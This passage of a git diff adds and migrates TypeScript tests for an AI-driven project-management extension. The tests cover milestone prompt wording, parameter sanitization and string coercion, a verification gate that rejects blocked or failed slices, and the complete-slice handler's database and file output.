     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── deriveState integration: completing-milestone dispatches correctly ─
-  console.log("\n=== deriveState completing-milestone integration ===");
-  {
+  test("step 11 specifies write tool for PROJECT.md update (#2946)", () => {
+    const prompt = loadPromptFromWorktree("complete-milestone", {
+      workingDirectory: "/tmp/test-project",
+      milestoneId: "M001",
+      milestoneTitle: "Tool Guidance Test",
+      roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+      inlinedContext: "context",
+      milestoneSummaryPath: ".gsd/milestones/M001/M001-SUMMARY.md",
+      skillActivation: "",
+    });
+
+    // Step 11 must explicitly name the `write` tool so the LLM doesn't
+    // confuse it with `edit` (which requires path + oldText + newText).
+    // See: https://github.com/gsd-build/gsd-2/issues/2946
+    assert.ok(
+      /PROJECT\.md.*\bwrite\b/i.test(prompt) || /\bwrite\b.*PROJECT\.md/i.test(prompt),
+      "step 11 must name the `write` tool when updating PROJECT.md",
+    );
+
+    // The prompt must NOT leave tool choice ambiguous for PROJECT.md
+    // Verify it mentions the required parameter (`content` or `path`)
+    assert.ok(
+      prompt.includes("`.gsd/PROJECT.md`") || prompt.includes('".gsd/PROJECT.md"'),
+      "step 11 must reference the PROJECT.md path explicitly",
+    );
+  });
+
+  test("sanitizeCompleteMilestoneParams normalizes string parameters", async () => {
+    const { sanitizeCompleteMilestoneParams } = await import("../bootstrap/sanitize-complete-milestone.ts");
+
+    // Simulate params as they might arrive from the SDK after partial JSON parse:
+    // - numbers instead of strings
+    // - null instead of arrays
+    // - extra whitespace in strings
+    // - undefined optional fields
+    const raw: any = {
+      milestoneId: "  M011 ",
+      title: 42,                              // number instead of string
+      oneLiner: "  One-liner with spaces  ",
+      narrative: "# Big markdown\n\nWith newlines and `backticks`\n\n```ts\ncode();\n```\n",
+      successCriteriaResults: null,            // null instead of string
+      definitionOfDoneResults: undefined,      // undefined instead of string
+      requirementOutcomes: 12345,              // number instead of string
+      keyDecisions: "not an array",            // string instead of array
+      keyFiles: null,                          // null instead of array
+      lessonsLearned: [" lesson one ", null, "", "  lesson two  "],
+      followUps: "  follow up  ",
+      deviations: undefined,
+      verificationPassed: "true",             // string instead of boolean
+    };
+
+    const sanitized = sanitizeCompleteMilestoneParams(raw);
+
+    // String fields are trimmed and coerced
+    assert.strictEqual(sanitized.milestoneId, "M011");
+    assert.strictEqual(sanitized.title, "42");
+    assert.strictEqual(sanitized.oneLiner, "One-liner with spaces");
+    assert.ok(sanitized.narrative.includes("# Big markdown"), "narrative preserves markdown");
+    assert.strictEqual(sanitized.successCriteriaResults, "");
+    assert.strictEqual(sanitized.definitionOfDoneResults, "");
+    assert.strictEqual(sanitized.requirementOutcomes, "12345");
+
+    // Array fields are normalized
+    assert.ok(Array.isArray(sanitized.keyDecisions), "keyDecisions is an array");
+    assert.deepStrictEqual(sanitized.keyDecisions, []);
+    assert.ok(Array.isArray(sanitized.keyFiles), "keyFiles is an array");
+    assert.deepStrictEqual(sanitized.keyFiles, []);
+    assert.deepStrictEqual(sanitized.lessonsLearned, ["lesson one", "lesson two"]);
+
+    // Optional fields — toStr() returns "" for undefined/null
+    assert.strictEqual(sanitized.followUps, "follow up");
+    assert.strictEqual(sanitized.deviations, "");
+
+    // Boolean coercion
+    assert.strictEqual(sanitized.verificationPassed, true);
+  });
+
+  test("sanitizeCompleteMilestoneParams handles large markdown content", async () => {
+    const { sanitizeCompleteMilestoneParams } = await import("../bootstrap/sanitize-complete-milestone.ts");
+
+    // Generate a large markdown string (~25k characters to exceed the 23667 position from the bug)
+    const largeMd = "# Milestone Summary\n\n" +
+      Array.from({ length: 500 }, (_, i) =>
+        `## Section ${i}\n\n` +
+        `- [x] Task ${i} completed with \`code\` and **bold** text\n` +
+        `  - Sub-item with special chars: <, >, &, ", '\n` +
+        `  - Another sub-item: \`\`\`ts\nconst x = ${i};\n\`\`\`\n`
+      ).join("\n");
+
+    assert.ok(largeMd.length > 23667, `generated markdown is ${largeMd.length} chars, must exceed 23667`);
+
+    const raw: any = {
+      milestoneId: "M011",
+      title: "Content Depth, Narrative & Onboarding",
+      oneLiner: "Large milestone with many slices",
+      narrative: largeMd,
+      successCriteriaResults: largeMd,
+      definitionOfDoneResults: largeMd,
+      requirementOutcomes: largeMd,
+      keyDecisions: ["decision 1", "decision 2"],
+      keyFiles: ["file1.ts", "file2.ts"],
+      lessonsLearned: ["lesson 1"],
+      followUps: "Some follow-ups",
+      deviations: "Some deviations",
+      verificationPassed: true,
+    };
+
+    const sanitized = sanitizeCompleteMilestoneParams(raw);
+
+    // Large content should pass through without truncation or corruption
+    assert.strictEqual(sanitized.narrative, largeMd.trim());
+    assert.strictEqual(sanitized.successCriteriaResults, largeMd.trim());
+    assert.strictEqual(sanitized.definitionOfDoneResults, largeMd.trim());
+    assert.strictEqual(sanitized.requirementOutcomes, largeMd.trim());
+  });
+
+  test("milestoneCompleteExecute uses sanitized params", async () => {
+    // This test verifies that the execute function sanitizes params before passing
+    // to handleCompleteMilestone. We test indirectly: if we pass numeric milestoneId,
+    // the handler should still receive a string (and return a meaningful error, not a crash).
+    const { handleCompleteMilestone } = await import("../tools/complete-milestone.ts");
+    const { sanitizeCompleteMilestoneParams } = await import("../bootstrap/sanitize-complete-milestone.ts");
+    const base = createFixtureBase();
+    try {
+      // Simulate what milestoneCompleteExecute should do: sanitize then call handler
+      const raw: any = {
+        milestoneId: 42,           // number — would crash without sanitization
+        title: "Test",
+        oneLiner: "Test",
+        narrative: "Test narrative",
+        successCriteriaResults: "Results",
+        definitionOfDoneResults: "Done",
+        requirementOutcomes: "Outcomes",
+        keyDecisions: null,        // null — would crash .length without sanitization
+        keyFiles: "not-array",     // string — would crash .map without sanitization
+        lessonsLearned: undefined, // undefined — would crash .map without sanitization
+        followUps: "",
+        deviations: "",
+        verificationPassed: true,
+      };
+
+      const sanitized = sanitizeCompleteMilestoneParams(raw);
+
+      // Verify sanitization didn't crash and produced valid typed params
+      assert.strictEqual(typeof sanitized.milestoneId, "string", "milestoneId is a string after sanitization");
+      assert.ok(Array.isArray(sanitized.keyDecisions), "keyDecisions is array after sanitization");
+      assert.ok(Array.isArray(sanitized.keyFiles), "keyFiles is array after sanitization");
+      assert.ok(Array.isArray(sanitized.lessonsLearned), "lessonsLearned is array after sanitization");
+      assert.strictEqual(typeof sanitized.verificationPassed, "boolean", "verificationPassed is boolean after sanitization");
+
+      // Calling handleCompleteMilestone may throw GSD_STALE_STATE (no DB in test env)
+      // but it should NOT throw TypeError from type mismatches — that's the bug fix.
+      try {
+        await handleCompleteMilestone(sanitized, base);
+      } catch (err: any) {
+        // GSD_STALE_STATE or "No database open" is acceptable — it means we got past
+        // the type-sensitive code and failed on DB access, which is expected in tests.
+        assert.ok(
+          err.code === "GSD_STALE_STATE" || err.message?.includes("database"),
+          `expected DB error, got: ${err.message}`,
+        );
+      }
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("deriveState completing-milestone integration", async () => {
     const { deriveState, isMilestoneComplete } = await import("../state.ts");
     const { invalidateAllCaches: invalidateAllCachesDynamic } = await import("../cache.ts");
-    const { parseRoadmap } = await import("../files.ts");
+    const { parseRoadmap } = await import("../parsers-legacy.ts");
 
     const base = createFixtureBase();
     try {
@@ -180,30 +429,23 @@ async function main(): Promise<void> {
       const roadmapPath = join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
       const roadmapContent = await loadFile(roadmapPath);
       const roadmap = parseRoadmap(roadmapContent!);
-      assertTrue(isMilestoneComplete(roadmap), "isMilestoneComplete returns true when all slices are [x]");
+      assert.ok(isMilestoneComplete(roadmap), "isMilestoneComplete returns true when all slices are [x]");
 
       // Verify deriveState returns completing-milestone phase (with validation already done)
       writeMilestoneValidation(base, "M001");
       const state = await deriveState(base);
-      assertEq(state.phase, "completing-milestone", "deriveState returns completing-milestone when all slices done, no summary");
-      assertEq(state.activeMilestone?.id, "M001", "active milestone is M001");
-      assertEq(state.activeSlice, null, "no active slice in completing-milestone");
+      assert.strictEqual(state.phase, "completing-milestone", "deriveState returns completing-milestone when all slices done, no summary");
+      assert.strictEqual(state.activeMilestone?.id, "M001", "active milestone is M001");
+      assert.strictEqual(state.activeSlice, null, "no active slice in completing-milestone");
 
       // Now add the summary and verify it transitions to complete
       writeMilestoneSummary(base, "M001", "# M001 Summary\n\nDone.");
       invalidateAllCachesDynamic();
       const stateAfter = await deriveState(base);
-      assertEq(stateAfter.phase, "complete", "deriveState returns complete after summary exists");
-      assertEq(stateAfter.registry[0]?.status, "complete", "registry shows complete status");
+      assert.strictEqual(stateAfter.phase, "complete", "deriveState returns complete after summary exists");
+      assert.strictEqual(stateAfter.registry[0]?.status, "complete", "registry shows complete status");
     } finally {
       cleanup(base);
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/complete-slice-string-coercion.test.ts b/src/resources/extensions/gsd/tests/complete-slice-string-coercion.test.ts
new file mode 100644
index 000000000..5dbdae3e8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-slice-string-coercion.test.ts
@@ -0,0 +1,247 @@
+// GSD Extension — String coercion regression tests for complete-slice/task tools
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import * as os from "node:os";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../gsd-db.ts";
+import { handleCompleteSlice } from "../tools/complete-slice.ts";
+import type { CompleteSliceParams } from "../types.ts";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────
+
+/**
+ * The splitPair coercion logic extracted from db-tools.ts sliceCompleteExecute.
+ * Duplicated here so we can unit-test it directly.
+ */
+function splitPair(s: string): [string, string] {
+  const m = s.match(/^(.+?)\s*(?:—|-)\s+(.+)$/);
+  return m ? [m[1].trim(), m[2].trim()] : [s.trim(), ""];
+}
+
+function makeValidSliceParams(): CompleteSliceParams {
+  return {
+    sliceId: "S01",
+    milestoneId: "M001",
+    sliceTitle: "Test Slice",
+    oneLiner: "Implemented test slice",
+    narrative: "Built and tested.",
+    verification: "All tests pass.",
+    deviations: "None.",
+    knownLimitations: "None.",
+    followUps: "None.",
+    keyFiles: ["src/foo.ts"],
+    keyDecisions: ["D001"],
+    patternsEstablished: [],
+    observabilitySurfaces: [],
+    provides: ["test handler"],
+    requirementsSurfaced: [],
+    drillDownPaths: [],
+    affects: [],
+    requirementsAdvanced: [{ id: "R001", how: "Handler validates" }],
+    requirementsValidated: [],
+    requirementsInvalidated: [],
+    filesModified: [{ path: "src/foo.ts", description: "Handler" }],
+    requires: [],
+    uatContent: "## Smoke Test\n\nVerify all assertions pass.",
+  };
+}
+
+// ─── splitPair unit tests ────────────────────────────────────────────────
+
+describe("splitPair coercion helper (#3565)", () => {
+  test("plain string without delimiter returns string + empty", () => {
+    const [a, b] = splitPair("src/foo.ts");
+    assert.equal(a, "src/foo.ts");
+    assert.equal(b, "");
+  });
+
+  test("em-dash delimiter parses both parts", () => {
+    const [id, how] = splitPair("R001 — Handler validates task completion");
+    assert.equal(id, "R001");
+    assert.equal(how, "Handler validates task completion");
+  });
+
+  test("hyphen delimiter parses both parts", () => {
+    const [id, proof] = splitPair("R002 - Tests pass");
+    assert.equal(id, "R002");
+    assert.equal(proof, "Tests pass");
+  });
+
+  test("string with no space around hyphen is treated as plain", () => {
+    // e.g. a file path like "src/foo-bar.ts" should not split
+    const [a, b] = splitPair("src/foo-bar.ts");
+    assert.equal(a, "src/foo-bar.ts");
+    assert.equal(b, "");
+  });
+
+  test("whitespace is trimmed from both parts", () => {
+    const [id, how] = splitPair("  R003  —  Trimmed value  ");
+    assert.equal(id, "R003");
+    assert.equal(how, "Trimmed value");
+  });
+});
+
+// ─── verificationEvidence sentinel tests ─────────────────────────────────
+
+describe("verificationEvidence sentinel coercion (#3565)", () => {
+  function coerceEvidence(v: any) {
+    return typeof v === "string"
+      ? { command: v, exitCode: -1, verdict: "unknown (coerced from string)", durationMs: 0 }
+      : v;
+  }
+
+  test("string input produces non-passing sentinel", () => {
+    const result = coerceEvidence("npm test");
+    assert.equal(result.command, "npm test");
+    assert.equal(result.exitCode, -1);
+    assert.equal(result.verdict, "unknown (coerced from string)");
+    assert.equal(result.durationMs, 0);
+  });
+
+  test("object input passes through unchanged", () => {
+    const obj = { command: "npm test", exitCode: 0, verdict: "pass", durationMs: 1234 };
+    const result = coerceEvidence(obj);
+    assert.equal(result.exitCode, 0);
+    assert.equal(result.verdict, "pass");
+    assert.equal(result.durationMs, 1234);
+  });
+
+  test("sentinel exitCode is not 0 (must not fabricate success)", () => {
+    const result = coerceEvidence("anything");
+    assert.notEqual(result.exitCode, 0, "exitCode must not be 0 for coerced strings");
+    assert.ok(
+      !result.verdict.includes("pass"),
+      "verdict must not contain 'pass' for coerced strings",
+    );
+  });
+});
+
+// ─── wrapArray coercion unit tests (#3585) ──────────────────────────────
+
+describe("wrapArray coercion for simple string-array fields (#3585)", () => {
+  /**
+   * The wrapArray coercion logic extracted from db-tools.ts sliceCompleteExecute.
+   * Duplicated here so we can unit-test it directly.
+   */
+  function wrapArray(v: any): any[] {
+    return v == null ? [] : Array.isArray(v) ? v : [v];
+  }
+
+  test("null returns empty array", () => {
+    assert.deepEqual(wrapArray(null), []);
+  });
+
+  test("undefined returns empty array", () => {
+    assert.deepEqual(wrapArray(undefined), []);
+  });
+
+  test("plain string wraps into single-element array", () => {
+    assert.deepEqual(
+      wrapArray("Validated Tech UI flows and Portal self-service flows"),
+      ["Validated Tech UI flows and Portal self-service flows"],
+    );
+  });
+
+  test("array passes through unchanged", () => {
+    const arr = ["item1", "item2"];
+    assert.deepEqual(wrapArray(arr), arr);
+  });
+
+  test("empty array passes through unchanged", () => {
+    assert.deepEqual(wrapArray([]), []);
+  });
+});
+
+// ─── Handler integration with coerced params ─────────────────────────────
+
+describe("handleCompleteSlice with coerced string arrays (#3565)", () => {
+  let dbPath: string;
+  let basePath: string;
+
+  beforeEach(() => {
+    dbPath = path.join(
+      fs.mkdtempSync(path.join(os.tmpdir(), "gsd-coerce-")),
+      "test.db",
+    );
+    openDatabase(dbPath);
+
+    basePath = fs.mkdtempSync(path.join(os.tmpdir(), "gsd-coerce-handler-"));
+    const sliceDir = path.join(basePath, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+    fs.mkdirSync(sliceDir, { recursive: true });
+
+    const roadmapPath = path.join(basePath, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
+    fs.writeFileSync(
+      roadmapPath,
+      [
+        "# M001: Test Milestone",
+        "",
+        "## Slices",
+        "",
+        '- [ ] **S01: Test Slice** `risk:medium` `depends:[]`',
+        "  - After this: basic functionality works",
+      ].join("\n"),
+    );
+
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete", title: "Task 1" });
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    fs.rmSync(path.dirname(dbPath), { recursive: true, force: true });
+    fs.rmSync(basePath, { recursive: true, force: true });
+  });
+
+  test("handler succeeds with coerced filesModified and requirementsAdvanced", async () => {
+    const params = makeValidSliceParams();
+    // Simulate coercion from plain strings
+    params.filesModified = ["src/foo.ts", "src/bar.ts"].map((f) => {
+      const [p, d] = splitPair(f);
+      return { path: p, description: d };
+    });
+    params.requirementsAdvanced = ["R001 — Handler validates task completion"].map((r) => {
+      const [id, how] = splitPair(r);
+      return { id, how };
+    });
+
+    const result = await handleCompleteSlice(params, basePath);
+    assert.ok(!("error" in result), "handler should succeed");
+    if (!("error" in result)) {
+      const summary = fs.readFileSync(result.summaryPath, "utf-8");
+      assert.match(summary, /src\/foo\.ts/);
+      assert.match(summary, /R001/);
+      assert.match(summary, /Handler validates task completion/);
+    }
+  });
+
+  test("handler succeeds with coerced requires and requirementsValidated", async () => {
+    const params = makeValidSliceParams();
+    params.requires = ["S00 — Provided base infrastructure"].map((r) => {
+      const [slice, provides] = splitPair(r);
+      return { slice, provides };
+    });
+    params.requirementsValidated = ["R002 - Tests pass"].map((r) => {
+      const [id, proof] = splitPair(r);
+      return { id, proof };
+    });
+
+    const result = await handleCompleteSlice(params, basePath);
+    assert.ok(!("error" in result), "handler should succeed");
+    if (!("error" in result)) {
+      const summary = fs.readFileSync(result.summaryPath, "utf-8");
+      assert.match(summary, /S00/);
+      assert.match(summary, /Provided base infrastructure/);
+      assert.match(summary, /R002/);
+      assert.match(summary, /Tests pass/);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/complete-slice-verification-gate.test.ts b/src/resources/extensions/gsd/tests/complete-slice-verification-gate.test.ts
new file mode 100644
index 000000000..30efb9a51
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-slice-verification-gate.test.ts
@@ -0,0 +1,72 @@
+/**
+ * Regression test for #3580 — complete-slice verification gate
+ *
+ * Without the gate, a prompt regression could silently advance a blocked
+ * or failed slice to "complete" status. The fix adds a BLOCKED_SIGNALS
+ * regex that rejects completion when verification/UAT content clearly
+ * indicates blocked or failed state.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'tools', 'complete-slice.ts'),
+  'utf-8',
+)
+
+describe('complete-slice verification gate (#3580)', () => {
+  it('BLOCKED_SIGNALS regex is defined', () => {
+    assert.ok(
+      src.includes('BLOCKED_SIGNALS'),
+      'BLOCKED_SIGNALS constant must be defined in complete-slice.ts',
+    )
+  })
+
+  it('BLOCKED_SIGNALS is a regex that tests verification content', () => {
+    // Extract the BLOCKED_SIGNALS definition line
+    const idx = src.indexOf('BLOCKED_SIGNALS')
+    assert.ok(idx !== -1)
+    const lineEnd = src.indexOf(';', idx)
+    const definition = src.slice(idx, lineEnd)
+
+    // Must be a regex (starts with /)
+    assert.ok(
+      definition.includes('= /'),
+      'BLOCKED_SIGNALS must be assigned a regex literal',
+    )
+
+    // Must match key blocked/failed signals
+    assert.ok(definition.includes('blocked'), 'regex must match "blocked" signals')
+    assert.ok(definition.includes('failed'), 'regex must match "failed" signals')
+  })
+
+  it('gate checks params.verification and params.uatContent', () => {
+    // Find usage of BLOCKED_SIGNALS.test
+    const testCalls = src.match(/BLOCKED_SIGNALS\.test\([^)]+\)/g)
+    assert.ok(testCalls, 'BLOCKED_SIGNALS.test() must be called')
+    assert.ok(testCalls.length >= 2, 'must check at least verification and uatContent')
+
+    const joined = testCalls.join(' ')
+    assert.ok(joined.includes('verification'), 'must test params.verification')
+    assert.ok(joined.includes('uatContent'), 'must test params.uatContent')
+  })
+
+  it('gate returns an error message when blocked signals detected', () => {
+    // Find the return statement after BLOCKED_SIGNALS check
+    const gateIdx = src.indexOf('BLOCKED_SIGNALS.test(')
+    assert.ok(gateIdx !== -1)
+
+    const afterGate = src.slice(gateIdx, gateIdx + 500)
+    assert.ok(
+      afterGate.includes('return { error:'),
+      'blocked signal detection must return an error',
+    )
+    assert.ok(
+      afterGate.includes('do not complete'),
+      'error message must explain why completion is rejected',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/complete-slice.test.ts b/src/resources/extensions/gsd/tests/complete-slice.test.ts
new file mode 100644
index 000000000..ed5073ff8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/complete-slice.test.ts
@@ -0,0 +1,432 @@
+import { createTestContext } from './test-helpers.ts';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import {
+  openDatabase,
+  closeDatabase,
+  transaction,
+  _getAdapter,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getSlice,
+  updateSliceStatus,
+  getSliceTasks,
+} from '../gsd-db.ts';
+import { handleCompleteSlice } from '../tools/complete-slice.ts';
+import type { CompleteSliceParams } from '../types.ts';
+
+const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function tempDbPath(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-complete-slice-'));
+  return path.join(dir, 'test.db');
+}
+
+function cleanup(dbPath: string): void {
+  closeDatabase();
+  try {
+    const dir = path.dirname(dbPath);
+    for (const f of fs.readdirSync(dir)) {
+      fs.unlinkSync(path.join(dir, f));
+    }
+    fs.rmdirSync(dir);
+  } catch {
+    // best effort
+  }
+}
+
+function cleanupDir(dirPath: string): void {
+  try {
+    fs.rmSync(dirPath, { recursive: true, force: true });
+  } catch {
+    // best effort
+  }
+}
+
+/**
+ * Create a temp project directory with .gsd structure and roadmap for handler tests.
+ */
+function createTempProject(): { basePath: string; roadmapPath: string } {
+  const basePath = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-slice-handler-'));
+  const sliceDir = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01');
+  const tasksDir = path.join(sliceDir, 'tasks');
+  fs.mkdirSync(tasksDir, { recursive: true });
+
+  const roadmapPath = path.join(basePath, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+  fs.writeFileSync(roadmapPath, `# M001: Test Milestone
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:medium\` \`depends:[]\`
+  - After this: basic functionality works
+
+- [ ] **S02: Second Slice** \`risk:low\` \`depends:[S01]\`
+  - After this: advanced stuff
+`);
+
+  return { basePath, roadmapPath };
+}
+
+function makeValidSliceParams(): CompleteSliceParams {
+  return {
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    sliceTitle: 'Test Slice',
+    oneLiner: 'Implemented test slice with full coverage',
+    narrative: 'Built the handler, registered the tool, and wrote comprehensive tests.',
+    verification: 'All 8 test sections pass with 0 failures.',
+    deviations: 'None.',
+    knownLimitations: 'None.',
+    followUps: 'None.',
+    keyFiles: ['src/tools/complete-slice.ts', 'src/bootstrap/db-tools.ts'],
+    keyDecisions: ['D001'],
+    patternsEstablished: ['SliceRow/rowToSlice follows same pattern as TaskRow/rowToTask'],
+    observabilitySurfaces: ['SELECT status FROM slices shows completion state'],
+    provides: ['complete_slice handler', 'gsd_slice_complete tool'],
+    requirementsSurfaced: [],
+    drillDownPaths: ['milestones/M001/slices/S01/tasks/T01-SUMMARY.md'],
+    affects: ['S02'],
+    requirementsAdvanced: [{ id: 'R001', how: 'Handler validates task completion' }],
+    requirementsValidated: [],
+    requirementsInvalidated: [],
+    filesModified: [
+      { path: 'src/tools/complete-slice.ts', description: 'Handler implementation' },
+      { path: 'src/bootstrap/db-tools.ts', description: 'Tool registration' },
+    ],
+    requires: [],
+    uatContent: `## Smoke Test
+
+Run the test suite and verify all assertions pass.
+
+## Test Cases
+
+### 1. Handler happy path
+
+1. Insert complete tasks in DB
+2. Call handleCompleteSlice()
+3. **Expected:** SUMMARY.md + UAT.md written, roadmap checkbox toggled, DB updated`,
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Schema v6 migration
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: schema v6 migration ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const adapter = _getAdapter()!;
+
+  // Verify schema version is current (v14 after indexes + slice_dependencies)
+  const versionRow = adapter.prepare('SELECT MAX(version) as v FROM schema_version').get();
+  assertEq(versionRow?.['v'], 14, 'schema version should be 14');
+
+  // Verify slices table has full_summary_md and full_uat_md columns
+  const cols = adapter.prepare("PRAGMA table_info(slices)").all();
+  const colNames = cols.map(c => c['name'] as string);
+  assertTrue(colNames.includes('full_summary_md'), 'slices table should have full_summary_md column');
+  assertTrue(colNames.includes('full_uat_md'), 'slices table should have full_uat_md column');
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: getSlice/updateSliceStatus accessors
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: getSlice/updateSliceStatus accessors ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  // Insert milestone and slice
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', risk: 'high' });
+
+  // getSlice returns correct row
+  const slice = getSlice('M001', 'S01');
+  assertTrue(slice !== null, 'getSlice should return non-null for existing slice');
+  assertEq(slice!.id, 'S01', 'slice id');
+  assertEq(slice!.milestone_id, 'M001', 'slice milestone_id');
+  assertEq(slice!.title, 'Test Slice', 'slice title');
+  assertEq(slice!.risk, 'high', 'slice risk');
+  assertEq(slice!.status, 'pending', 'slice default status should be pending');
+  assertEq(slice!.completed_at, null, 'slice completed_at should be null initially');
+  assertEq(slice!.full_summary_md, '', 'slice full_summary_md should be empty initially');
+  assertEq(slice!.full_uat_md, '', 'slice full_uat_md should be empty initially');
+
+  // getSlice returns null for non-existent
+  const noSlice = getSlice('M001', 'S99');
+  assertEq(noSlice, null, 'non-existent slice should return null');
+
+  // updateSliceStatus changes status and completed_at
+  const now = new Date().toISOString();
+  updateSliceStatus('M001', 'S01', 'complete', now);
+  const updated = getSlice('M001', 'S01');
+  assertEq(updated!.status, 'complete', 'slice status should be updated to complete');
+  assertEq(updated!.completed_at, now, 'slice completed_at should be set');
+
+  cleanup(dbPath);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// complete-slice: Handler happy path
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== complete-slice: handler happy path ===');
+{
+  const dbPath = tempDbPath();
+  openDatabase(dbPath);
+
+  const { basePath, roadmapPath } = createTempProject();
+
+  // Set up DB state: milestone, slices (S01 + S02), 2 complete tasks
+  insertMilestone({ id: 'M001' });
+  insertSlice({ id: 'S01', milestoneId: 'M001' });
+  insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice' });
+  insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', status: 'complete', title: 'Task 1' });
+  insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', status: 'complete', title: 'Task 2' });
+
+  const params = makeValidSliceParams();
+  const result = await handleCompleteSlice(params, basePath);
+
+  assertTrue(!('error' in result), 'handler should succeed without error');
+  if (!('error' in result)) {
+    assertEq(result.sliceId, 'S01', 'result sliceId');
+    assertEq(result.milestoneId, 'M001', 'result milestoneId');
+    assertTrue(result.summaryPath.endsWith('S01-SUMMARY.md'), 'summaryPath should end with S01-SUMMARY.md');
+    assertTrue(result.uatPath.endsWith('S01-UAT.md'), 'uatPath should end with S01-UAT.md');
+
+    // (a) Verify SUMMARY.md exists on disk with correct YAML frontmatter
+    assertTrue(fs.existsSync(result.summaryPath), 'summary file should exist on disk');
+    const summaryContent = fs.readFileSync(result.summaryPath, 'utf-8');
+    assertMatch(summaryContent, /^---\n/, 'summary should start with YAML frontmatter');
+    assertMatch(summaryContent, /id: S01/, 'summary should contain id: S01');
+    assertMatch(summaryContent, /parent: M001/, 'summary should contain parent: M001');
+    assertMatch(summaryContent, /milestone: M001/, 'summary should contain milestone: M001');
+    assertMatch(summaryContent, /blocker_discovered: false/, 'summary should contain blocker_discovered');
+    assertMatch(summaryContent, /verification_result: passed/, 'summary should contain verification_result');
+    assertMatch(summaryContent, /key_files:/, 'summary should contain key_files');
+    assertMatch(summaryContent, /patterns_established:/, 'summary should contain patterns_established');
+    assertMatch(summaryContent, /observability_surfaces:/, 'summary should contain observability_surfaces');
+    assertMatch(summaryContent, /provides:/, 'summary should contain provides');
+    assertMatch(summaryContent, /# S01: Test Slice/, 'summary should have H1 with slice ID and title');
+    assertMatch(summaryContent, /\*\*Implemented test slice with full coverage\*\*/, 'summary should have one-liner in bold');
+    assertMatch(summaryContent, /## What Happened/, 'summary should have What Happened section');
+    assertMatch(summaryContent, /## Verification/, 'summary should have Verification section');
+    assertMatch(summaryContent, /## Requirements Advanced/, 'summary should have Requirements Advanced section');
+
+    // (b) Verify UAT.md exists on disk
+    assertTrue(fs.existsSync(result.uatPath), 'UAT file should exist on disk');
+    const uatContent = fs.readFileSync(result.uatPath, 'utf-8');
+    assertMatch(uatContent, /# S01: Test Slice — UAT/, 'UAT should have correct title');
+    assertMatch(uatContent, /Milestone:\*\* M001/, 'UAT should reference milestone');
+    assertMatch(uatContent, /Smoke Test/, 'UAT should contain smoke test from params');
+
+    // (c) Verify roadmap shows S01 complete (✅) and S02 pending (⬜) in table format
+    // Projection renders roadmap as a Slice Overview table, not checkbox list
+    const roadmapContent = fs.readFileSync(roadmapPath, 'utf-8');
+    assertMatch(roadmapContent, /\| S01 \|/, 'S01 should appear in roadmap table');
+    assertTrue(roadmapContent.includes('✅'), 'completed S01 should show ✅ in roadmap table');
+    assertMatch(roadmapContent, /\| S02 \|/, 'S02 should appear in roadmap table');
+    assertTrue(roadmapContent.includes('⬜'), 'pending S02 should show ⬜ in roadmap table');
+
+    // (d) Verify full_summary_md and full_uat_md stored in DB for D004 recovery
+    const sliceAfter = getSlice('M001', 'S01');
+    assertTrue(sliceAfter !== null, 'slice should exist in DB after handler');
+    assertTrue(sliceAfter!.full_summary_md.length > 0, 'full_summary_md should be non-empty in DB');
+    assertMatch(sliceAfter!.full_summary_md, /id: S01/, 'full_summary_md should contain frontmatter');
+    assertTrue(sliceAfter!.full_uat_md.length > 0, 'full_uat_md should be non-empty in DB');
+    assertMatch(sliceAfter!.full_uat_md, /S01: Test Slice — UAT/, 'full_uat_md should contain UAT title');
+
+    // (e) Verify slice status is complete in DB
+    assertEq(sliceAfter!.status, 'complete', 'slice status should be complete in DB');
